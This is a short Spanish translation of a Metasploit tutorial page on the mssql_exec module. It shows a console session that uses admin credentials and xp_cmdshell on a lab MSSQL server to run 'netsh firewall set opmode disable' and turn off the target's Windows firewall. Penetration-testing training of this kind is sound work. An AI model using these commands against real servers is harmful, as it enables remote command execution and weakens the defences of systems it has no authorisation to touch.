Mssql/mssql exec

De www.metasploit-es.com.ar

El modulo admin "mssql exec" toma ventaja del procedimiento de xp_cmdshell para ejecutar comandos en el sistema remoto. Si has adquirido a adivinado las credenciales admin MSSQL, este puede ser un modulo muy util.

 msf > use auxiliary/admin/mssql/mssql_exec
 msf auxiliary(mssql_exec) > show options
 Module options (auxiliary/admin/mssql/mssql_exec):
  Name      Current Setting                       Required  Description
  ----      ---------------                       --------  -----------
  CMD       cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
  PASSWORD                                        no        The password for the specified username
  RHOST                                           yes       The target address
  RPORT     1433                                  yes       The target port
  USERNAME  sa                                    no        The username to authenticate as

Definimos nuestros valores RHOST y PASSWORD y configurados el CMD para deshabilitar el cortafuegos de Windows en el sistema remoto. Esto nos puede permitir potencialmente explotar otros servicios que se estan ejecutando en el objetivo.

 msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
 CMD => netsh firewall set opmode disable
 msf auxiliary(mssql_exec) > set PASSWORD password1
 PASSWORD => password1
 msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
 RHOST => 192.168.1.195
 msf auxiliary(mssql_exec) > run
 [*] The server may have xp_cmdshell disabled, trying to enable it...
 [*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'
 output
 ------
 Ok.
 [*] Auxiliary module execution completed
 msf auxiliary(mssql_exec) >

• mssql/mssql_enum
• mssql/msssql_idf

Original de www.offensive-security.com
Traducido por cbk999